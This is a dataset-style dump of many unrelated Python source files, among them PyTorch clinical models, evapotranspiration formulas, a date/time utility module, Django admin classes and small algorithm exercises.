content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
import torch
from torch import nn
import clinicaldg.eicu.Constants as Constants
class FlattenedDense(nn.Module):
def __init__(self, ts_cat_levels, static_cat_levels, emb_dim, num_layers, num_hidden_units,
t_max = 48, dropout_p = 0.2):
super().__init__()
self.ts_cat_levels = ts_cat_levels
self.static_cat_levels = static_cat_levels
self.emb_dim = emb_dim
self.ts_embedders = nn.ModuleList([nn.Embedding(num_embeddings = ts_cat_levels[i], embedding_dim = emb_dim) for i in ts_cat_levels])
self.static_embedders = nn.ModuleList([nn.Embedding(num_embeddings = static_cat_levels[i], embedding_dim = emb_dim) for i in static_cat_levels])
input_size = (len(Constants.ts_cont_features) * t_max + len(Constants.ts_cat_features) * emb_dim * t_max
+ len(Constants.static_cont_features) + len(Constants.static_cat_features) * emb_dim
)
layers = [nn.Linear(input_size, num_hidden_units)]
for i in range(1, num_layers):
layers.append(nn.ReLU())
layers.append(nn.Dropout(p = dropout_p))
layers.append(nn.BatchNorm1d(num_hidden_units))
layers.append(nn.Linear(num_hidden_units, num_hidden_units))
self.clf = nn.Sequential(*layers)
self.n_outputs = num_hidden_units
def forward(self, x):
ts_cont_feats, ts_cat_feats, static_cont_feats, static_cat_feats = (x['ts_cont_feats'].float(),
x['ts_cat_feats'], x['static_cont_feats'].float(), x['static_cat_feats'])
# shape of ts inputs: (batch_size, 48, n_features)
# shape of static inputs: (batch_size, n_features)
ts_cont_feats = ts_cont_feats.flatten(start_dim = 1) # now (batch_size, n_features*48)
cat_embs = []
for i in range(len(self.ts_embedders)):
cat_embs.append(self.ts_embedders[i](ts_cat_feats[:, :, i]).flatten(start_dim = 1))
for i in range(len(self.static_embedders)):
cat_embs.append(self.static_embedders[i](static_cat_feats[:, i]))
x_in = torch.cat(cat_embs, dim = 1)
x_in = torch.cat([x_in, ts_cont_feats, static_cont_feats], dim = 1)
return self.clf(x_in)
class GRUNet(nn.Module):
def __init__(self, ts_cat_levels, static_cat_levels, emb_dim, num_layers, num_hidden_units,
t_max = 48, dropout_p = 0.2):
super().__init__()
self.ts_cat_levels = ts_cat_levels
self.static_cat_levels = static_cat_levels
self.emb_dim = emb_dim
self.t_max = t_max
self.ts_embedders = nn.ModuleList([nn.Embedding(num_embeddings = ts_cat_levels[i], embedding_dim = emb_dim) for i in ts_cat_levels])
self.static_embedders = nn.ModuleList([nn.Embedding(num_embeddings = static_cat_levels[i], embedding_dim = emb_dim) for i in static_cat_levels])
input_size = (len(Constants.ts_cont_features) + len(Constants.ts_cat_features) * emb_dim
+ len(Constants.static_cont_features) + len(Constants.static_cat_features) * emb_dim
)
self.gru = nn.GRU(input_size = input_size, hidden_size = num_hidden_units, num_layers = num_layers,
batch_first = True, dropout = dropout_p, bidirectional = True)
self.n_outputs = num_hidden_units * 2 # bidirectional
def forward(self, x):
ts_cont_feats, ts_cat_feats, static_cont_feats, static_cat_feats = (x['ts_cont_feats'].float(),
x['ts_cat_feats'], x['static_cont_feats'].float(), x['static_cat_feats'])
# shape of ts inputs: (batch_size, 48, n_features)
# shape of static inputs: (batch_size, n_features)
x_in = torch.cat([ts_cont_feats] + [embedder(ts_cat_feats[:, :, c]) for c, embedder in enumerate(self.ts_embedders)], dim = -1)
cat_embs = []
for i in range(len(self.static_embedders)):
cat_embs.append(self.static_embedders[i](static_cat_feats[:, i]))
statics = torch.cat([static_cont_feats] + cat_embs, dim = -1)
statics = statics.unsqueeze(1).expand(statics.shape[0], self.t_max, statics.shape[-1])
x_in = torch.cat([x_in, statics], dim = -1)
return self.gru(x_in)[0][:, -1, :]
|
python
|
'''
Copyright University of Minnesota 2020
Authors: Mohana Krishna, Bryan C. Runck
'''
import math
# Formulas specified here can be found in the following document:
# https://www.mesonet.org/images/site/ASCE_Evapotranspiration_Formula.pdf
# Page number of each formula is supplied with each function.
def get_delta(temp):
"""
Reference page number: 28-29
Parameters
------------------------------
temp: (``float``)
The air temperature in degrees Celcius
Returns
------------------------------
delta: (``float``)
The slope of the saturation vapor pressure-temperature curve in kPa/C
"""
numerator = 2503 * math.exp((17.27 * temp) / (temp + 237.3))
denominator = math.pow(temp + 237.3, 2)
delta = numerator / denominator
return delta
def get_flux_density(r_n_metric, r_n, os):
"""
Reference page number: 44
Currently, nighttime is defined as solar radiation values less than or equal to 5
Parameters
------------------------------
r_n_metric: (``float``)
Solar radiation in W/m^2
r_n: (``float``)
Solar radiation in MJ/hm2
os: (``bool``)
Boolean which indicates whether to calculate G for short reference or tall reference
Returns
------------------------------
G: (``float``)
Soil heat flux density MJ/m^2 h
"""
G = None
daytime = r_n_metric > 5
if os:
if daytime:
G = 0.1 * r_n
else:
G = 0.5 * r_n
else:
if daytime:
G = 0.04 * r_n
else:
G = 0.2 * r_n
return G
def get_gamma(p):
"""
Reference page number: 28
Parameters
------------------------------
p: (``float``)
Barometric pressure in kPa
Returns
------------------------------
gamma: (``float``)
Gamma (psychrometric constant) in kPa/C
"""
gamma = 0.000665 * p
return gamma
def get_cn(r_n_metric, os):
"""
Reference page number: 5
Parameters
------------------------------
r_n_metric: (``float``)
Solar radiation in W/m^2
os: (``bool``)
Boolean which indicates whether to calculate G for short reference or tall reference
Returns
------------------------------
cn: (``int``)
Numerator constant
"""
cn = None
daytime = r_n_metric > 5
if os:
if daytime > 5:
cn = 37
return cn
else:
cn = 37
return cn
else:
if daytime > 5:
cn = 66
return cn
else:
cn = 66
return cn
def get_cd(r_n_metric, os):
"""
Reference page number: 5
Parameters
------------------------------
r_n_metric: (``float``)
Solar radiation in W/m^2
os: (``bool``)
Boolean which indicates whether to calculate G for short reference or tall reference
Returns
------------------------------
cd: (``float``)
Denominator constant
"""
cd = None
daytime = r_n_metric > 5
if os:
if daytime > 5:
cd = 0.24
return cd
else:
cd = 0.96
return cd
else:
if daytime > 5:
cd = 0.25
return cd
else:
cd = 1.7
return cd
def get_es(temp):
"""
Reference page number: 29
Parameters
------------------------------
temp: (``float``)
Air temperature in degrees Celcius
Returns
------------------------------
es: (``float``)
The saturation vapour pressure
"""
es = 0.6108 * math.exp((17.27 * temp) / (temp + 237.3))
return es
def get_ea(temp, rh):
"""
Reference page number: 31-32
Parameters
------------------------------
temp: (``float``)
Air temperature in degrees Celcius
rh: (``float``)
Relative humidity
Returns
------------------------------
ea: (``float``)
The actual vapour pressure
"""
es = get_es(temp)
ea = (rh / 100) * es
return ea
def solar_rad_metric_to_campbell(rad):
"""
Parameters
------------------------------
rad: (``float``)
Solar radiation in W/m2
Returns
------------------------------
campbell_rad: (``float``)
Solar radiation in MJ/hm2
"""
campbell_rad = rad * (3600 / math.pow(10, 6))
return campbell_rad
def solar_rad_campbell_to_metric(rad):
"""
Parameters
------------------------------
rad: (``float``)
Solar radiation in MJ/hm2
Returns
------------------------------
metric_rad: (``float``)
Solar radiation in W/m2
"""
metric_rad = rad * (math.pow(10, 6) / 3600)
return metric_rad
|
python
|
from pathlib import Path
from cosmology import Cosmology
from instruments import Instrument
class Simulation:
def __init__(self, data_path, save_path, field, sim_type='src_inj',
cosmo='Planck18'):
self.data_path = Path(data_path)
self.save_path = Path(save_path)
self.field = field
self.sim_type = self._is_valid_sim_type(sim_type)
self.cosmo = Cosmology(cosmo)
self.instruments = self._set_instruments()
def _is_valid_sim_type(self, sim_type):
if sim_type not in ['src_inj', 'analytic']:
raise ValueError(f'Simulation type "{sim_type}" not recognized, ' +
'must be either "src_inj" or "analytic"')
return sim_type
def _set_instruments(self):
if self.field == 'COSMOS':
instr = [Instrument(self.data_path, 'HSC'),
Instrument(self.data_path, 'VIRCam')]
elif self.field in ['GOODS-N', 'GOODS-S']:
instr = [Instrument(self.data_path, 'WFC3')]
else:
raise ValueError(f'Field "{self.field}" not recognized, must be ' +
'"COSMOS", "GOODS-N", or "GOODS-S"')
return instr
|
python
|
# -*- coding: utf-8 -*-
class Solution:
def countPrimes(self, n):
if n == 0 or n == 1:
return 0
result = [1] * n
result[0] = result[1] = 0
for i, el in enumerate(result):
if el:
for j in range(i * i, n, i):
result[j] = 0
return sum(result)
if __name__ == '__main__':
solution = Solution()
assert 0 == solution.countPrimes(0)
assert 0 == solution.countPrimes(1)
assert 0 == solution.countPrimes(2)
assert 1 == solution.countPrimes(3)
assert 2 == solution.countPrimes(4)
assert 2 == solution.countPrimes(5)
assert 3 == solution.countPrimes(6)
assert 3 == solution.countPrimes(7)
assert 4 == solution.countPrimes(8)
assert 4 == solution.countPrimes(9)
assert 4 == solution.countPrimes(10)
assert 4 == solution.countPrimes(11)
assert 5 == solution.countPrimes(12)
|
python
|
import logging
import os
from nose.plugins import Plugin
log = logging.getLogger('nose.plugins.helloworld')
class HelloWorld(Plugin):
name = 'helloworld'
def options(self, parser, env=os.environ):
super(HelloWorld, self).options(parser, env=env)
def configure(self, options, conf):
super(HelloWorld, self).configure(options, conf)
if not self.enabled:
return
def finalize(self, result):
log.info('Hello pluginized world!')
|
python
|
from __future__ import absolute_import
from pyramid.view import view_config
from sqlalchemy import func, and_, or_
from . import timestep_from_request
import tangos
from tangos import core
def add_urls(halos, request, sim, ts):
for h in halos:
h.url = request.route_url('halo_view', simid=sim.escaped_basename, timestepid=ts.escaped_extension,
halonumber=h.basename)
@view_config(route_name='timestep_view', renderer='../templates/timestep_view.jinja2')
def timestep_view(request):
ts = timestep_from_request(request)
sim = ts.simulation
all_objects = []
typecode = 0
while True:
try:
typetag = core.Halo.object_typetag_from_code(typecode)
except ValueError:
break
objects = request.dbsession.query(core.Halo).\
filter_by(timestep_id=ts.id, object_typecode=typecode).order_by(core.Halo.halo_number).all()
add_urls(objects, request, sim, ts)
title = core.Halo.class_from_tag(typetag).__name__+"s"
if title=="BHs":
title="Black holes"
elif title=="PhantomHalos":
title="Phantom halos"
all_objects.append({'title': title, 'typetag': typetag, 'items': objects})
print(typecode, title, len(objects))
typecode+=1
return {'timestep': ts.extension,
'objects': all_objects,
'gather_url': request.route_url('calculate_all',simid=request.matchdict['simid'],
timestepid=request.matchdict['timestepid'],
nameid="")[:-5]}
|
python
|
#!/usr/bin/python3
#
# Copyright © 2017 jared <jared@jared-devstation>
#
# Generates data based on source material
import analyze
markov_data = analyze.data_gen()
|
python
|
#!/usr/bin/env python3
# coding = utf8
import datetime
import pytz
import time
import copy
import sys
def get_utc_datetime():
"""
获取utc时间
"""
utc_datetime_str = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
return utc_datetime_str
def get_utc_timestamp():
"""
获取utc时间的时间戳
"""
utc_timestamp_str = datetime.datetime.utcnow().timestamp()
return utc_timestamp_str
def get_utc_time_dict():
"""
获取utc时间的时间和时间戳字典
"""
utc_time_now = datetime.datetime.utcnow()
utc_datetime_str = utc_time_now.strftime('%Y-%m-%dT%H:%M:%SZ')
utc_timestamp_str = utc_time_now.timestamp()
return {'utc_datetime_str': utc_datetime_str, 'utc_timestamp_str': utc_timestamp_str}
def get_year(
date_input: str = None, # 输入日期
date_delimiter: str = "-" # 日期分隔符
):
"""
获取当前系统的当前时间:年份
:return: 2018
"""
if date_input is None:
year = datetime.datetime.now().year
else:
a1 = date_input.find(date_delimiter, 0)
year = int(date_input[0:a1])
return year
def get_month(
date_input: str = None, # 输入日期
date_delimiter: str = "-" # 日期分隔符
):
"""
获取当前系统的当前时间:月份
:return: 8
"""
if date_input is None:
month = datetime.datetime.now().month
else:
date = str(date_input)
a1 = date.find(date_delimiter, 0)
a2 = date.find(date_delimiter, a1 + 1)
month = int(date[a1 + 1:a2])
return month
def get_day(
date_input: str = None, # 输入日期
date_delimiter: str = "-" # 日期分隔符
):
"""
获取当前系统的当前时间:日数
:return: 1
"""
if date_input is None:
day = datetime.datetime.now().day
else:
date = str(date_input)
a1 = date.find(date_delimiter, 0)
a2 = date.find(date_delimiter, a1 + 1)
day = int(date[a2 + 1:len(date)])
return day
def get_hour():
"""
获取当前系统的当前时间:小时数(24小时制)
:return: 14
"""
hour = datetime.datetime.now().hour
return hour
def get_minute():
"""
获取当前系统的当前时间:分钟数
:return: 28
"""
minute = datetime.datetime.now().minute
return minute
def get_second():
"""
获取当前系统的当前时间:秒数
:return: 23
"""
second = datetime.datetime.now().second
return second
def get_time():
"""
获取当前系统的当前时间格式的时间,精确到秒且只有时间
:return: 14:20:41
"""
inner_now = datetime.datetime.now()
data_time = inner_now.strftime('%H:%M:%S')
return data_time
def get_datetime():
"""
获取当前系统的当前时间格式的时间,精确到秒
:return: 2018-08-01 14:18:31
"""
inner_now = datetime.datetime.now()
data_time = inner_now.strftime('%Y-%m-%d %H:%M:%S')
return data_time
def get_datetime_full():
"""
获取当前系统的当前时间格式的时间,精确度最高
:return: 2018-08-01 14:16:50.611705
"""
inner_now = datetime.datetime.now()
return inner_now
def get_datetime_str_int():
"""
获取当前系统的当前时间格式的时间,精确到秒
:return: 20180801141831
"""
inner_now = datetime.datetime.now()
data_time = inner_now.strftime('%Y%m%d%H%M%S')
return data_time
def get_relative_date(
num: int = 0
):
"""
获取当前系统当前时间的相对时间:日期,num为0表示当日,num为负数表示向历史推算的天数,num为正数表示向未来推算的天数
:param num:
:return: 2018-08-01
"""
today = datetime.date.today()
date = today - datetime.timedelta(days=-num)
return date
def get_relative_datetime(
num: int = 0
):
"""
获取当前系统当前时间的相对时间:日期,num为0表示当日,num为负数表示向历史推算的天数,num为正数表示向未来推算的天数
:param num:
:return: 2021-04-23 17:23:27
"""
today = datetime.datetime.now()
date = today - datetime.timedelta(days=-num)
return date.strftime('%Y-%m-%d %H:%M:%S')
def get_timestamp():
"""
获取当前系统的当前时间戳格式的时间,返回的类型为int
:return: 1533104393
"""
inner_now = time.time()
return int(inner_now)
def get_timestamp2datetime(
timestamp: int,
f: str = "%Y-%m-%d %H:%M:%S"
):
"""
将时间戳转换为datetime时间
:param timestamp: 同时支持字符串和数字格式
:param f:
:return: 2018-08-01 14:19:53
"""
if timestamp is not None:
time_array = time.localtime(timestamp)
date_time = time.strftime(f, time_array)
return date_time
else:
return
def get_timestamp2date(
timestamp: int,
f: str = "%Y-%m-%d"
):
"""
将时间戳转换为datetime时间
默认将输入转换为int
:param timestamp:
:param f:
:return: 2018-08-01 14:19:53
"""
if timestamp is not None:
time_array = time.localtime(timestamp)
date_time = time.strftime(f, time_array)
return date_time
else:
return
def get_date2timestamp(
date: str,
f: str = "%Y-%m-%d"
):
"""
将日期转换为对应日期的0点的时间戳
:param date:
:param f:
:return: 1533052800
"""
time_array = time.strptime(date, f)
timestamp = int(time.mktime(time_array))
return timestamp
def get_datetime2timestamp(
data: str,
f: str = "%Y-%m-%d %H:%M:%S"
):
time_array = time.strptime(data, f)
timestamp = int(time.mktime(time_array))
return timestamp
def get_datetime2date(
datetime_str: str
):
datetime_timestamp = get_datetime2timestamp(datetime_str)
date_str = get_timestamp2date(datetime_timestamp)
return date_str
def timestamp_day_num_start(
num: int = 0
):
"""
换算出相对时间的当日开始时间的时间戳
:param num:
:return: 1533052800(2018-08-01 00:00:00)
"""
inner = get_relative_date(num=num)
return get_date2timestamp(str(inner))
def timestamp_day_num_end(
num: int = 0
):
"""
换算出相对时间的当日结束时间的时间戳
:param num:
:return: 1533139199(2018-08-01 23:59:59)
"""
inner = get_relative_date(num=num+1)
return get_date2timestamp(str(inner))-1
def get_format_date(
date_ori: str,
date_delimiter: str = '-', # 日期分隔符号
):
"""
将以'-'连接的字符串的日期格式化为日期格式
:param date_ori:
:param date_delimiter:
:return: 2018-01-01
"""
a1 = date_ori.find(date_delimiter, 0)
a2 = date_ori.find(date_delimiter, a1+1)
year = int(date_ori[0:a1])
month = int(date_ori[a1+1:a2])
day = int(date_ori[a2+1:len(date_ori)])
format_date = datetime.date(year, month, day)
return format_date
def get_format_date_2(
date_ori: str
):
"""
将以的字符串的日期格式化为日期格式:20200602
按照位置分
:param date_ori:
:return: 2018-01-01
"""
year = int(date_ori[0:4])
month = int(date_ori[4:6])
day = int(date_ori[6:8])
format_date = datetime.date(year, month, day)
return format_date
def get_format_datetime(
datetime_ori: str,
date_delimiter: str = '-', # 日期分隔符号
space_delimiter: str = "+", # 空格分隔符号
time_delimiter: str = '-' # 时间分隔符号
):
"""
将以'-'连接的字符串的日期格式化为日期格式
:param datetime_ori:
:param date_delimiter: 日期分隔符号
:param space_delimiter: 空格分隔符号
:param time_delimiter: 时间分隔符号
:return: 2018-01-01
"""
date_str, time_str = datetime_ori.split(space_delimiter)
date_str = str(date_str)
d1 = date_str.find(date_delimiter, 0)
d2 = date_str.find(date_delimiter, d1+1)
year_num = int(date_str[0:d1])
month_num = int(date_str[d1+1:d2])
day_num = int(date_str[d2+1:len(date_str)])
time_str = str(time_str)
t1 = time_str.find(time_delimiter, 0)
t2 = time_str.find(time_delimiter, t1 + 1)
hour_num = int(time_str[0:t1])
minute_num = int(time_str[t1 + 1:t2])
second_num = int(time_str[t2 + 1:len(time_str)])
format_date = datetime.datetime(year_num, month_num, day_num, hour_num, minute_num, second_num)
return format_date
def time_gap_seconds(
start_time: str,
end_time: str
):
"""
计算两个时间的间隔秒数
:param start_time:
:param end_time:
:return:
"""
start_time_f = get_format_datetime(start_time)
end_time_f = get_format_datetime(end_time)
return (end_time_f - start_time_f).seconds
def time_gap_days(
start_time: str,
end_time: str
):
"""
计算两个时间的间隔天数
:param start_time:
:param end_time:
:return:
"""
start_time_f = get_format_date(start_time)
end_time_f = get_format_date(end_time)
return (end_time_f - start_time_f).days
def get_add_date(
date_input: str,
num: int,
f: str = '%Y-%m-%d'
):
"""
计算指定日期(date_ori)的相对日期
:param date_input:
:param num:
:param f:
:return: 2018-01-02
"""
date = get_format_date(date_input)
delta = datetime.timedelta(days=num)
n_days = date + delta
date_add = n_days.strftime(f)
return date_add
def get_timestamp_interval_seconds(
timestamp: int
):
"""
计算指定时间戳距离当前系统的当前时间的秒数,正数表示未来时间,负数表示过去时间
:param timestamp:
:return: 30830
"""
inner_now = time.time()
res = timestamp - int(inner_now)
return res
def count_down(
num: int
):
"""
倒数计时器,按照指定的秒数原地倒计时刷新数字
:param num:
:return:
"""
count = 0
while count < num:
n_count = num - count
sys.stdout.write("\r%d " % n_count)
sys.stdout.flush()
time.sleep(1)
count += 1
def running_controller(
start_running_time: str,
end_running_time: str,
start_running_time_f: str = '%H:%M:%S',
end_running_time_f: str = '%H:%M:%S'
):
"""
判断系统时间是否落在设定的时间区间内,是则输出True,否则输出False
:param start_running_time:
:param end_running_time:
:param start_running_time_f:
:param end_running_time_f:
:return:
"""
if (start_running_time is None) and (end_running_time is None):
return True
else:
inner_now = datetime.datetime.strptime(str(get_time()), "%H:%M:%S")
inner_start = datetime.datetime.strptime(start_running_time, start_running_time_f)
inner_end = datetime.datetime.strptime(end_running_time, end_running_time_f)
if (inner_now >= inner_start) and (inner_now < inner_end):
return True
else:
return False
def now():
inner_now = datetime.datetime.now()
return inner_now
def date_string(
date=now()
):
"""
将输入的时间转换为日期格式的字符串,如果不传入参数将取当前系统时间
:param date:
:return:
"""
date_string_in = date.strftime('%Y-%m-%d')
return date_string_in
def time_string(
date=now()
):
time_string_in = date.strftime('%Y-%m-%d %H-%M-%S')
return time_string_in
def datetime_string(
date=now()
):
time_string_in = date.strftime('%Y-%m-%d %H-%M-%S')
return time_string_in
def datetime_string_chs(
date=now()
):
time_string_in = date.strftime('%Y年%m月%d日%H时%M分%S秒')
return time_string_in
def date_str_list(
start_date: str,
end_date: str
):
# 生成起止时间之间的时间序列
start_date_f = get_format_date(start_date)
end_date_f = get_format_date(end_date)
date_list = list()
date_list.append(start_date_f)
added_date = start_date_f
while True:
added_date = get_add_date(added_date, 1)
added_date_f = get_format_date(added_date)
if added_date_f > end_date_f:
break
else:
date_list.append(str(added_date))
return date_list
def date_str_list_form_now(
day_num: int = 1
):
start_date = get_add_date(date_string(), -day_num)
end_date = date_string()
res_list = date_str_list(start_date=start_date, end_date=end_date)
return res_list
def get_normalized_date_string(
days: int = 0
):
"""
获取多少天以前的时间字符串
:param days: 多少天以前
:return: 时间字符串(xxxx-xx-xx xx:xx:xx)
"""
current_time = datetime.datetime.now()
target_time = current_time - datetime.timedelta(days=days)
normalized_target_time = target_time.strftime('%Y-%m-%d %H:%M:%S')
return normalized_target_time
def get_data_date_string(
days: int = 0
):
"""
获取多少天以前的时间字符串
:param days: 多少天以前
:return: 时间字符串(xxxx-xx-xx)
"""
current_time = datetime.datetime.now()
target_time = current_time - datetime.timedelta(days=days)
date_time = target_time.strftime('%Y-%m-%d')
return date_time
def get_date_string(
days: int = 0
):
"""
获取多少天以后的时间字符串
:param days: 多少天以后,正数向未来计算,负数向历史计算,0是当天
:return: 时间字符串(xxxx-xx-xx)
"""
current_time = datetime.datetime.now()
target_time = current_time + datetime.timedelta(days=days)
date_str = target_time.strftime('%Y-%m-%d')
return date_str
def time_day_num_start(
num: int = 0
):
"""
换算出相对时间的当日开始时间的时间
:param num:
:return: 2018-08-01 00:00:00
"""
now = datetime.datetime.now()
return now - datetime.timedelta(days=num, hours=now.hour, minutes=now.minute, seconds=now.second,
microseconds=now.microsecond)
def time_day_num_end(
num: int = 0
):
"""
换算出相对时间的当日结束时间的时间
:param num:
:return: 2018-08-01 23:59:59
"""
now = datetime.datetime.now()
return now - datetime.timedelta(days=num - 1, hours=now.hour, minutes=now.minute, seconds=now.second + 1,
microseconds=now.microsecond)
def timestamp_list_splitter(
timestamp_list: list,
n: int = 2
):
# 时间戳范围拆分器
"""
输入timestamp_list:[[start,end]],splitter_num:2
执行将list中的每段时间按照设定的份数拆分,拆分为粗略拆分,
:return:
"""
t_list_new = list()
for each_t_list in timestamp_list:
a = each_t_list[0] # 获取开始时间戳
b = each_t_list[1] # 获取结束时间戳
if (b - a) > 1: # 当数字间隔大于1的时候才有拆分意义
m = round((b - a)/n, 0) # 计算加值数
if m > 0:
pass
elif m == 0:
m = 1
else:
continue
t_list_new_temp = [[a, int(a + m)], [int(a + m + 1), b]]
t_list_new.extend(t_list_new_temp)
else:
t_list_new.extend([each_t_list])
return t_list_new
def date_gap_splitter(
start_date: str, # 开始日期
end_date: str, # 结束日期
splitter_gap: int = 1, # 拆分计算间隔
successive: bool = False # 结果是否连续
):
"""
时间拆分器,将按照起止时间和间隔时间拆分时间段
拆分从前向后拆分
:return:
"""
day_gap = time_gap_days(start_date, end_date)
if splitter_gap >= day_gap:
return [[start_date, end_date]]
else:
res_list = list()
start_date_temp = start_date
add_count = 0
while True:
end_date_temp = get_add_date(start_date_temp, splitter_gap)
day_gap -= splitter_gap
finish_num = get_date2timestamp(end_date) - get_date2timestamp(end_date_temp)
if finish_num <= 0:
res_list.append([str(start_date_temp), str(end_date)])
break
else:
res_list.append([str(start_date_temp), str(end_date_temp)])
if successive is True:
start_date_temp = copy.deepcopy(end_date_temp)
else:
start_date_temp = get_add_date(end_date_temp, 1)
add_count += 1
return res_list
def get_time_duration(
duration: int
):
# 计算秒数的时长
# start_duration = - 8 * 60 * 60 # 固定值
temp_datetime = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=duration)
# temp_datetime = get_timestamp2datetime(duration + start_duration) # 计算1970-01-01 00:00:00 后指定秒的日期
temp_date, temp_time = str(temp_datetime).split(' ') # 分割日期和时间
temp_day = time_gap_days(start_time='1970-01-01', end_time=temp_date) # 计算天数间隔
if temp_day == 0:
duration_str = temp_time
else:
duration_str = '%sd %s' % (temp_day, temp_time)
res = {
'duration_days': temp_day,
'duration_time': temp_time,
'duration_str': duration_str,
'duration': duration
}
return res
def print_t(
text
):
print("%s >> %s" % ((datetime.datetime.now()), text))
def utc_format(
utc_time=None,
timezone_local="Asia/shanghai",
input_format="%Y-%m-%dT%H:%M:%S.%fZ",
output_format="%Y-%m-%d %H:%M:%S"
):
if utc_time is None:
utc_time = datetime.datetime.utcnow()
else:
pass
local_tz = pytz.timezone(timezone_local)
if isinstance(utc_time, datetime.datetime) is True:
utc_datetime = utc_time
else:
utc_datetime = datetime.datetime.strptime(utc_time, input_format)
utc_timestamp = utc_datetime.timestamp()
utc_datetime_str = utc_datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
local_datetime = utc_datetime.replace(tzinfo=pytz.utc).astimezone(local_tz)
local_timestamp = local_datetime.timestamp()
local_datetime_str = local_datetime.strftime(output_format)
res = {
'utc_timestamp': int(utc_timestamp),
'utc_timestamp_m': int(utc_timestamp * 1000),
'utc_datetime_str': utc_datetime_str,
'local_timestamp': int(local_timestamp),
'local_timestamp_m': int(local_timestamp * 1000),
'local_datetime_str': local_datetime_str,
}
return res
def get_file_name(
date_delimiter: str = '-', # 日期分隔符号
space_delimiter: str = "+", # 空格分隔符号
time_delimiter: str = '-' # 时间分隔符号
):
"""
获取当前系统的当前时间格式的时间,精确到秒
:return: 2018年08月01日 14时18分31秒
"""
inner_now = datetime.datetime.now()
f_list = ['%Y', date_delimiter, '%m', date_delimiter, '%d', space_delimiter, '%H', time_delimiter, '%M', time_delimiter, '%S']
f_str = ''.join(f_list)
data_time = inner_now.strftime(f_str)
return data_time
|
python
|
# -*- coding: utf-8 -*-
"""
Configurations
--------------
Specifies the set of configurations for a marksim package
"""
import os
class Configs:
"""
Configurations
"""
# TODO This might be not the best design decision to pack all variables under one class.
# tpm configs
MARKOV_ORDER = 1
"""the order of a markov property or how memoryless is our simulation"""
MARKOV_STATES = 100
"""number of states of the markov process"""
# simulation configs
N_SIM = 100
"""number of simulations to perform"""
# analysis configs
PERCENTILES = 80
"""whether to analyse top 10 or 20 or etc... """
CONFIDENCE = 99
"""p value"""
|
python
|
def test_dbinit(db):
pass
|
python
|
# https://leetcode.com/problems/random-pick-with-weight
import random
import bisect
class Solution:
def __init__(self, ws: List[int]):
s = sum(ws)
v = 0
self.cumsum = [v := v + w / s for w in ws]
def pickIndex(self) -> int:
return bisect.bisect_left(self.cumsum, random.uniform(0, 1))
# Your Solution object will be instantiated and called as such:
# obj = Solution(w)
# param_1 = obj.pickIndex()
|
python
|
from django.apps import AppConfig
default_app_config = 'mozillians.groups.GroupConfig'
class GroupConfig(AppConfig):
name = 'mozillians.groups'
def ready(self):
import mozillians.groups.signals # noqa
|
python
|
'''
Created on Jan 19, 2016
@author: elefebvre
'''
|
python
|
from django.apps import AppConfig
class GqlConfig(AppConfig):
name = 'gql'
|
python
|
from django.db.models import Q
from django.db.models.manager import Manager
class WorkManager(Manager):
def match(self, data):
"""
Try to match existing Work instance in the best way possible by the data.
If iswc is in data, try to find the match using the following tries:
1. Matching iswc.
2. Matching by source and id from source among the items without iswc.
3. Matching by title and contributor among the items without iswc.
If iswc is not in data:
1. Matching by source and id from source.
2. Matching by title and contributor.
:param data: dict of prepared data for each field.
:return: matched Work instance or None if match is not found.
"""
match_by_source = Q(source=data['source'], id_from_source=data['id_from_source'])
match_by_title = Q(title=data['title'])
match_by_title_synonyms = Q(title_synonyms__contains=[data['title']])
match_by_contributor = Q(contributors__in=data['contributors'])
if data['iswc']:
match_queries = [
Q(iswc=data['iswc']),
Q(iswc=None) & match_by_source,
Q(iswc=None) & match_by_title & match_by_contributor,
Q(iswc=None) & match_by_title_synonyms & match_by_contributor,
]
else:
match_queries = [
match_by_source,
match_by_title & match_by_contributor,
match_by_title_synonyms & match_by_contributor
]
for query in match_queries:
instances = self.filter(query).distinct('pk')
if instances.count() == 1:
return instances[0]
return None
|
python
|
from .bmk_semihost import *
|
python
|
"""
The borg package contains modules that assimilate large quantities of data into
pymatgen objects for analysis.
"""
|
python
|
from django.utils import timezone
from django.contrib import admin
from django.urls import path
from .models import Post, Category, Tag, Comment, Commenter
from . import views
@admin.register(Post)
class PostAdmin(admin.ModelAdmin):
list_display = ['title', 'author','status', 'last_edition_date']
readonly_fields = ['slug','creation_date', 'last_edition_date', 'publication_date']
ordering = ('-creation_date',)
raw_id_fields = ('banner',)
def save_model(self, request, obj, form, change):
old_obj = Post.objects.filter(pk=obj.pk)
if len(old_obj)>0:
if obj.status =='p' and (old_obj.last().status !='p' or obj.publication_date==None):
obj.publication_date = timezone.now()
else:
if obj.status =='p':
obj.publication_date = timezone.now()
if obj.author is None:
obj.author = request.user
super().save_model(request, obj, form, change)
def get_urls(self):
urls = super().get_urls()
my_urls = [
path('<int:year>/<int:month>/<int:day>/<slug:slug>/<int:demo>', views.post, name='post_demo'),
]
return my_urls + urls
def get_queryset(self, request):
qs = super(PostAdmin, self).get_queryset(request)
if request.user.is_superuser:
return qs
else:
return qs.filter(author=request.user)
@admin.register(Tag)
class TagAdmin(admin.ModelAdmin):
list_display = ['name']
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
list_display = ['name']
@admin.register(Comment)
class CommentAdmin(admin.ModelAdmin):
list_display = ['author', 'post', 'status']
@admin.register(Commenter)
class CommenterAdmin(admin.ModelAdmin):
list_display = ['nickname', 'email', 'status']
|
python
|
import matplotlib.pyplot as plt
import numpy as np
import random as rd
dim = 100
def reward(i, j):
string = dim/2
bp = complex(dim/2, dim/2)
bp = (bp.real, bp.imag)
cp = complex(i, j)
cp = (cp.real, cp.imag)
xdiff = cp[0]-bp[0]
if bp[1] < cp[1]:
s = 1/(1 + 10*abs(bp[0]-cp[0])/string)
# s = -(xdiff*xdiff-string*string)/string/string
else:
s = (abs((cp[0]-bp[0]))-string)/string
# s = (xdiff*xdiff-string*string)/string/string
return s
def draw_reward():
image = np.zeros((dim, dim))
for i in range(dim):
for j in range(dim):
image[i, j] = reward(j, dim-i)
print(image)
implot = plt.imshow(image, cmap='hot', vmin=-1, vmax=1)
plt.show()
draw_reward()
|
python
|
import gi
import enum
import g13gui.model.bindings as bindings
from g13gui.observer.gtkobserver import GtkObserver
from g13gui.model.bindingprofile import BindingProfile
from g13gui.model.bindings import StickMode
from g13gui.model.bindings import ALL_STICK_MODES
gi.require_version('Gtk', '3.0')
